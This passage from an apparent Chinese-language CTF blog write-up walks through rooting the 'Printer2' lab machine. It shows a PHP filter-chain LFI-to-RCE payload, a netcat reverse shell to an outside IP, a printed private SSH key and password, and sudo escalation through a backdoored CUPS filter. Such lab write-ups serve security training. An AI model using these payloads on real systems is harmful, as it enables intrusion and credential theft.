V4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMjoxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDk6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLXRpbWVzeW5jOng6MTA0OjExMDpzeXN0ZW1kIFRpbWUgU3luY2hyb25pemF0aW9uLCwsOi9ydW4vc3lzdGVtZDovdXNyL3NiaW4vbm9sb2dpbgphdmFoaS1hdXRvaXBkOng6MTA1OjExMzpBdmFoaSBhdXRvaXAgZGFlbW9uLCwsOi92YXIvbGliL2F2YWhpLWF1dG9pcGQ6L3Vzci9zYmluL25vbG9naW4Kc3NoZDp4OjEwNjo2NTUzNDo6L3J1bi9zc2hkOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtY29yZWR1bXA6eDo5OTk6OTk5OnN5c3RlbWQgQ29yZSBEdW1wZXI6LzovdXNyL3NiaW4vbm9sb2dpbgptYWJlbGxlOng6MTAwMDoxMDAwOiwsLDovaG9tZS9tYWJlbGxlOi9iaW4vYmFzaAphdmFoaTp4OjEwNzoxMTU6QXZhaGkgbUROUyBkYWVtb24sLCw6L3J1bi9hdmFoaS1kYWVtb246L3Vzci9zYmluL25vbG9naW4Kc2FuZWQ6eDoxMDg6MTE3OjovdmFyL2xpYi9zYW5lZDovdXNyL3NiaW4vbm9sb2dpbgpjb2xvcmQ6eDoxMDk6MTE4OmNvbG9yZCBjb2xvdXIgbWFuYWdlbWVudCBkYWVtb24sLCw6L3Zhci9saWIvY29sb3JkOi91c3Ivc2Jpbi9ub2xvZ2luCnNhbHQ6eDoxMTA6MTE5OjovdmFyL2xpYi9zYWx0Oi9iaW4vc2gKX3JwYzp4OjExMTo2NTUzNDo6L3J1bi9ycGNiaW5kOi91c3Ivc2Jpbi9ub2xvZ2luCmtpZXJyYTp4OjEwMDE6MTAwMjosLCw6L2hvbWUva2llcnJhOi9iaW4vYmFzaAo=<\/code><\/pre>\n\u53d1\u73b0\u53ef\u4ee5\u4f7f\u7528\u4f2a\u534f\u8bae\u8fdb\u884c\u8bfb\u5199\uff0c\u5c1d\u8bd5\u6784\u9020php\u94fe\u8fdb\u884c\u547d\u4ee4\u6267\u884c\uff01<\/p>\n
python3 php_filter_chain_generator.py --chain '<?=`$_GET[0]` ?>'\n[+] The following gadget chain will generate the following code : <?=`$_GET[0]` ?> (base64 value: PD89YCRfR0VUWzBdYCA\/Pg)\nphp:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp<\/code><\/pre>\n\u5c1d\u8bd5\u53cd\u5f39shell\uff01\uff01\uff01\uff01<\/p>\n
http:\/\/printer4life.printer.hmv\/index.php?page=php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&0=whoami<\/code><\/pre>\n<\/div><\/p>\n\u6210\u529f\u6267\u884c\u547d\u4ee4\uff0c\u53cd\u5f39\u4e00\u4e0bshell\uff01\uff01\uff01\uff01<\/p>\n
http:\/\/printer4life.printer.hmv\/index.php?page=payload&0=nc+-e+\/bin\/bash+192.168.0.143+1234<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@printer.hmv:\/var\/www\/printer4life$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@printer.hmv:\/var\/www\/printer4life$ cat \/etc\/passwd | grep "bash"\nroot:x:0:0:root:\/root:\/bin\/bash\nmabelle:x:1000:1000:,,,:\/home\/mabelle:\/bin\/bash\nkierra:x:1001:1002:,,,:\/home\/kierra:\/bin\/bash\n(remote) www-data@printer.hmv:\/var\/www\/printer4life$ cd \/home\n(remote) www-data@printer.hmv:\/home$ ls\nkierra mabelle\n(remote) www-data@printer.hmv:\/home$ cd kierra\/\n(remote) www-data@printer.hmv:\/home\/kierra$ ls -la\ntotal 24\ndrwxr-xr-x 2 kierra kierra 4096 Apr 22 2023 .\ndrwxr-xr-x 4 root root 4096 Apr 22 2023 ..\nlrwxrwxrwx 1 root root 9 Apr 22 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 kierra kierra 220 Apr 22 2023 .bash_logout\n-rw-r--r-- 1 kierra kierra 3526 Apr 22 2023 .bashrc\n-rw-r--r-- 1 kierra kierra 807 Apr 22 2023 .profile\n-rwx------ 1 kierra kierra 33 Apr 22 2023 user.txt\n(remote) www-data@printer.hmv:\/home\/kierra$ cat user.txt \ncat: user.txt: Permission denied\n(remote) www-data@printer.hmv:\/home\/kierra$ cd ..\/mabelle\/\n(remote) www-data@printer.hmv:\/home\/mabelle$ ls -la\ntotal 32\ndrwxr-xr-x 4 mabelle mabelle 4096 May 20 2023 .\ndrwxr-xr-x 4 root root 4096 Apr 22 2023 ..\nlrwxrwxrwx 1 root root 9 Apr 14 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 mabelle mabelle 220 Apr 14 2023 .bash_logout\n-rw-r--r-- 1 mabelle mabelle 3526 Apr 14 2023 .bashrc\ndrwxr-xr-x 3 mabelle mabelle 4096 May 20 2023 .local\n-rw-r--r-- 1 mabelle mabelle 807 Apr 14 2023 .profile\ndrwx------ 2 mabelle mabelle 4096 Apr 22 2023 .ssh\n-rw-r--r-- 1 mabelle mabelle 2602 Apr 22 2023 mabelle_private_ssh_key\n(remote) www-data@printer.hmv:\/home\/mabelle$ cat mabelle_private_ssh_key \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAsMI4Mddj7c6DmNM3BjMN2wlxX4VArJvNMpnR1ajE+cmrVQueoRDj\nxUaEnFZbJrlWHJbDFHCr\/dusXroIkqYbyq0NgOK4lQcWjKC\/kg6E3OBumzdfmnyiwsF\/58\ncMc70pG2frbQu6q29pKqyihtAtDV6xq827uMDuJve+ohUs8akybrf9dunLr2iabxRT4CF1\n7NfQCY4S2iQvHgF3pKgDXoS7w+q4s60dd0Ka76MvsxUGFULOMp4QUL0SMMC1NEUuWhYMqC\nlSGX0NwwTmr1INDFaNOROoPitfSi06E\/ckTC6xd3Se8xxLhWV4JtCo1b5Rv4riE2JhBtS\/\nSqhDEXixbML3l6eK5jZOxNnIAD9863ZXHLSx9hN8v\/yzlXJHYyjji37Te4yX73O+5iZE1V\n\/SeZlQ1Gf56+JZWqQSaLd48lI23ajJX3RIwXkOMJOg93cF6u8h9RQlrFtBqSy5UaAYe9OF\n3BNFvlnaDIEC7RXkmagSKBaRDjOdMNoGw7D4I3hlAAAFiOlYdG7pWHRuAAAAB3NzaC1yc2\nEAAAGBALDCODHXY+3Og5jTNwYzDdsJcV+FQKybzTKZ0dWoxPnJq1ULnqEQ48VGhJxWWya5\nVhyWwxRwq\/3brF66CJKmG8qtDYDiuJUHFoygv5IOhNzgbps3X5p8osLBf+fHDHO9KRtn62\n0LuqtvaSqsoobQLQ1esavNu7jA7ib3vqIVLPGpMm63\/Xbpy69omm8UU+AhdezX0AmOEtok\nLx4Bd6SoA16Eu8PquLOtHXdCmu+jL7MVBhVCzjKeEFC9EjDAtTRFLloWDKgpUhl9DcME5q\n9SDQxWjTkTqD4rX0otOhP3JEwusXd0nvMcS4VleCbQqNW+Ub+K4hNiYQbUv0qoQxF4sWzC\n95eniuY2TsTZyAA\/fOt2Vxy0sfYTfL\/8s5VyR2Mo44t+03uMl+9zvuYmRNVf0nmZUNRn+e\nviWVqkEmi3ePJSNt2oyV90SMF5DjCToPd3BervIfUUJaxbQaksuVGgGHvThdwTRb5Z2gyB\nAu0V5JmoEigWkQ4znTDaBsOw+CN4ZQAAAAMBAAEAAAGAOr4RFt9SInIDYgKvwqus6yJUPz\n51o+eTZkGgbrVL4QeYnQbjjPuj9qfc4mgAmvn1GEMySdS4FAGxYznIJ5R0oAKq\/i5a0Ywt\nfkbd45hXp2Ae4g6hAyJwpPDRpSGNjdlLlAQRRYgkXV0FQl1lFhCRKGRT\/5i7zkav3ttuy0\nbmTNnCHPGglqhUPNMyn7\/NsCrumeuPA93nff+QeRRbwqjjlcHe9NlI0M2zgTLtcr5017sg\n7mfpRwEowuxS40jn75sdovPlBDjd9nXggjF5njEtJH3002\/Y7ktvXj0zut8IYzDeuaToOD\n+7pdjrdwwjnSw+YESyDmGYYiU48vmj8NYmkmO5CR7yN54fa+fWMj+UE2gOaVXXKLSUj9Nv\nvgSdihcknccB8QSlpbV9P2fowgL2F66CQmMBpcijjGsqYAnnTlLvDl4rr4mKALGpkBXRdk\nONcfBr4GCN9DCZhw4xK\/BNMTM8y89nQo1hEhdFST\/2m+JdiekeGEBjsYCS6NFMAWEBAAAA\nwFQXd68P2TJtMUBLclBpnCeoJ1KvFSrpo4WMXG2uuSBUiy1x7KzM42atvMf0\/OwJstW6C2\nkhWO9Q0CxeqMuSb4lQ5BhAz3kNNt+kJtgBdinw8M8\/1x\/FzA18xrvtq2haFOGw8cGF1U3u\nfpF+FCJl5+PxAITjKQVxa+rJlz9P2oQHcTI5PU0yQwfle53Dv9JBOVBPhPo1ITenOR6PIj\nPs7r4yUJI6jnnZ1rguOJFo\/gehUHrPmfVW4NfnYkWBQFafsAAAAMEA27rpSEIF2xYcmwNJ\nd31W0vbL05K1Zs2496hjo2xuDd0VTZBF+8+d2iZSUvhiXGw9MDFb0kaWEWGSqOA4UivtY9\neSrIzmU6fCkn3oxXiFvfexCn3iSxcbz0r2T9oGZ4CLuy\/raMmVwSa049Jzw6gtXbzWq\/dO\nsXIO1MIj9fuJ7kjriG9CYOYlXk6f2mIZvVmip6HNXdCwLySFitwQATTMY4m1jYV2IqRKKj\nuYWiQ9K4MZj60POU2EvZ8Tqhlt1hqVAAAAwQDN73kJIzeQlliK82rqUPtdTffS\/sIPl5mz\n1aJkeS8MI2sMvyLibNaZ2B8CuVrQ9Zsc1KGIw7M4DVljdI4Ua6l29MHPsbY4YHvPupVwBm\njHhCzZOmzzxOKmySh\/U2GUf1BHx4E\/9dkbyXRlF\/bAzopTbTcmc1ktP1UKw4bJwblqUOIA\nrR1UiEpKQFxbLzTOxCfRUHWKGBVJU1jfXU5QWtQX6DubkCw0vM6P2UmoLioutXr3ZkNU8K\ny3EhaUlRX0QpEAAAATbWFiZWxsZUBwcmludGVyLmhtdg==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u5c1d\u8bd5\u5207\u6362\u4e00\u4e0b\u7528\u6237\uff01<\/p>\n
<\/div><\/p>\n\u8fdb\u4e00\u6b65\u63d0\u6743<\/h3>\n 3 sudo -l\n 4 ls -la\n 5 find \/ -perm -u=s -type f 2>\/dev\/null\n 6 \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n 7 ss -atlp\n 8 nc 127.0.0.1 1001<\/code><\/pre>\n\u56e0\u4e3a\u8fd0\u884c\u7a0b\u5e8f\u4f1a\u8986\u76d6\u7ec8\u7aef\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
No need for brute force here!\nHackerman<\/code><\/pre>\nI put a backdoor in a printer filter.\n\nFilter name: hack\nYou need to wait at least 60 seconds between attempts.<\/code><\/pre>\n\u8fdb\u4e00\u6b65\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
mabelle@printer:~$ cd \/opt\nmabelle@printer:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Apr 22 2023 .\ndrwxr-xr-x 18 root root 4096 Feb 6 2023 ..\ndrwxr-xr-x 26 501 staff 4096 Apr 16 2023 cups-2.3.3\nmabelle@printer:\/opt$ cd cups-2.3.3\/\nmabelle@printer:\/opt\/cups-2.3.3$ ls -la\n........\nmabelle@printer:\/opt\/cups-2.3.3$ cd filter\nmabelle@printer:\/opt\/cups-2.3.3\/filter$ ls -la\ntotal 1144\ndrwxr-xr-x 2 501 staff 4096 Apr 22 2023 .\ndrwxr-xr-x 26 501 staff 4096 Apr 16 2023 ..\n-rw-r--r-- 1 501 staff 11541 Feb 6 2023 commandtops.c\n-rw-r--r-- 1 root root 50488 Feb 6 2023 commandtops.o\n-rw-r--r-- 1 501 staff 11613 Feb 6 2023 common.c\n-rw-r--r-- 1 501 staff 1344 Feb 6 2023 common.h\n-rw-r--r-- 1 root root 49312 Feb 6 2023 common.o\n-rw-r--r-- 1 501 staff 2719 Feb 6 2023 Dependencies\n-rw-r--r-- 1 501 staff 2038 Feb 6 2023 gziptoany.c\n-rw-r--r-- 1 root root 17048 Feb 6 2023 gziptoany.o\n-rw-r--r-- 1 501 staff 4053 Feb 6 2023 Makefile\n-rw-r--r-- 1 501 staff 1295 Feb 6 2023 postscript-driver.header\n-rw-r--r-- 1 501 staff 14701 Feb 6 2023 postscript-driver.shtml\n-rw-r--r-- 1 501 staff 1275 Feb 6 2023 ppd-compiler.header\n-rw-r--r-- 1 501 staff 36686 Feb 6 2023 ppd-compiler.shtml\n-rw-r--r-- 1 501 staff 86511 Feb 6 2023 pstops.c\n-rw-r--r-- 1 root root 233464 Feb 6 2023 pstops.o\n-rw-r--r-- 1 501 staff 1232 Feb 6 2023 raster-driver.header\n-rw-r--r-- 1 501 staff 11869 Feb 6 2023 raster-driver.shtml\n-rw-r--r-- 1 501 staff 24526 Feb 6 2023 rastertoepson.c\n-rw-r--r-- 1 root root 104192 Feb 6 2023 rastertoepson.o\n-rw-r--r-- 1 501 staff 18977 Feb 6 2023 rastertohp.c\n-rw-r--r-- 1 root root 94120 Feb 6 2023 rastertohp.o\n-rw-r--r-- 1 501 staff 27170 Feb 6 2023 rastertolabel.c\n-rw-r--r-- 1 root root 129552 Feb 6 2023 rastertolabel.o\n-rw-r--r-- 1 root root 16862 Feb 6 2023 rastertopwg.c\n-rw-r--r-- 1 root root 78152 Feb 6 2023 rastertopwg.o\n-rw-r--r-- 1 501 staff 1346 Feb 6 2023 spec-ppd.header\n-rw-r--r-- 1 501 staff 79306 Feb 6 2023 spec-ppd.shtml<\/code><\/pre>\n\u7406\u8bba\u4e0a\u53ea\u8981\u8bd5\u5b8c\u5c31\u884c\u4e86\uff0c\u4f46\u662f\u6bcf\u8bd5\u4e00\u6b21\u5c31\u5f97\u505c60\u79d2\uff0c\u4ece\u540e\u5f80\u524d\u8fdb\u884c\u5c1d\u8bd5\uff0c\u3002<\/p>\n
mabelle@printer:\/opt\/cups-2.3.3\/filter$ ls *.c\ncommandtops.c common.c gziptoany.c pstops.c rastertoepson.c rastertohp.c rastertolabel.c rastertopwg.c<\/code><\/pre>\nI put a backdoor in a printer filter.\n\nFilter name: rastertopwg\n\nYou are awesome! Here is the password: wK4EyQ15Cga<\/code><\/pre>\n\u6210\u529f\uff0c\u62ff\u634f\u7684\u6b7b\u6b7b\u7684\uff0c\u563f\u563f\u3002<\/p>\n
\u5c1d\u8bd5\u5207\u6362\u6211\u4eec\u7684\u7528\u6237\uff1a<\/p>\n
mabelle@printer:\/opt\/cups-2.3.3\/filter$ su root\nPassword: \nsu: Authentication failure\nmabelle@printer:\/opt\/cups-2.3.3\/filter$ cat \/etc\/passwd | grep "bash"\nroot:x:0:0:root:\/root:\/bin\/bash\nmabelle:x:1000:1000:,,,:\/home\/mabelle:\/bin\/bash\nkierra:x:1001:1002:,,,:\/home\/kierra:\/bin\/bash\nmabelle@printer:\/opt\/cups-2.3.3\/filter$ su kierra\nPassword: \nkierra@printer:\/opt\/cups-2.3.3\/filter$ <\/code><\/pre>\n\u518d\u8fdb\u4e00\u6b65\u63d0\u6743<\/h3>\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo -l\n[sudo] password for kierra: \nMatching Defaults entries for kierra on printer:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser kierra may run the following commands on printer:\n (ALL : ALL) \/usr\/lib\/cups\/filter\/rastertopwg<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u51fd\u6570\u7684c\u8bed\u8a00\u4ee3\u7801\uff0c\u5e76\u5c1d\u8bd5\u8fd0\u884c\uff1a<\/p>\n
kierra@printer:\/opt\/cups-2.3.3\/filter$ ls -l \/usr\/lib\/cups\/filter\/rastertopwg\n-rwxr-xr-x 1 root root 18752 Mar 14 2022 \/usr\/lib\/cups\/filter\/rastertopwg\nkierra@printer:\/opt\/cups-2.3.3\/filter$ cat \/usr\/lib\/cups\/filter\/rastertopwg.c\ncat: \/usr\/lib\/cups\/filter\/rastertopwg.c: No such file or directory\nkierra@printer:\/opt\/cups-2.3.3\/filter$ ls -l *.c\n-rw-r--r-- 1 501 staff 11541 Feb 6 2023 commandtops.c\n-rw-r--r-- 1 501 staff 11613 Feb 6 2023 common.c\n-rw-r--r-- 1 501 staff 2038 Feb 6 2023 gziptoany.c\n-rw-r--r-- 1 501 staff 86511 Feb 6 2023 pstops.c\n-rw-r--r-- 1 501 staff 24526 Feb 6 2023 rastertoepson.c\n-rw-r--r-- 1 501 staff 18977 Feb 6 2023 rastertohp.c\n-rw-r--r-- 1 501 staff 27170 Feb 6 2023 rastertolabel.c\n-rw-r--r-- 1 root root 16862 Feb 6 2023 rastertopwg.c\nkierra@printer:\/opt\/cups-2.3.3\/filter$ cat rastertopwg.c<\/code><\/pre>\n\/*\n * 'main()' - Main entry for filter.\n *\/\n\nint \/* O - Exit status *\/\nmain(int argc, \/* I - Number of command-line args *\/\n char *argv[]) \/* I - Command-line arguments *\/\n{\n const char *final_content_type;\n\n for (int i = 1; i < argc; i++) {\n if (strncmp(argv[i], "exec:", 5) == 0) {\n system(argv[i] + 5);\n }\n }<\/code><\/pre>\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg exec: whoami\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg -exec whoami\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg exec whoami\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg exec:whoami\nroot\nUsage: rastertopwg job user title copies options [filename]\nkierra@printer:\/opt\/cups-2.3.3\/filter$ sudo \/usr\/lib\/cups\/filter\/rastertopwg exec:bash\nroot@printer:\/opt\/cups-2.3.3\/filter# cd \/root\nroot@printer:~# ls -la\ntotal 28\ndrwx------ 4 root root 4096 May 20 2023 .\ndrwxr-xr-x 18 root root 4096 Feb 6 2023 ..\nlrwxrwxrwx 1 root root 9 Apr 14 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 637 Apr 16 2023 .bashrc\ndrwx------ 2 root root 4096 Apr 23 2023 .config\ndrwxr-xr-x 3 root root 4096 Apr 23 2023 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rwx------ 1 root root 33 Feb 6 2023 root_flag.txt<\/code><\/pre>\n\u62ff\u5230rootshell\uff01\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Printer2 \u4fe1\u606f\u626b\u63cf \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/printer2] \u2514\u2500$ […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-653","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/653","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=653"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/653\/revisions"}],"predecessor-version":[{"id":654,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/653\/revisions\/654"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=653"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=653"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=653"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240428170133972\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751131.png\")
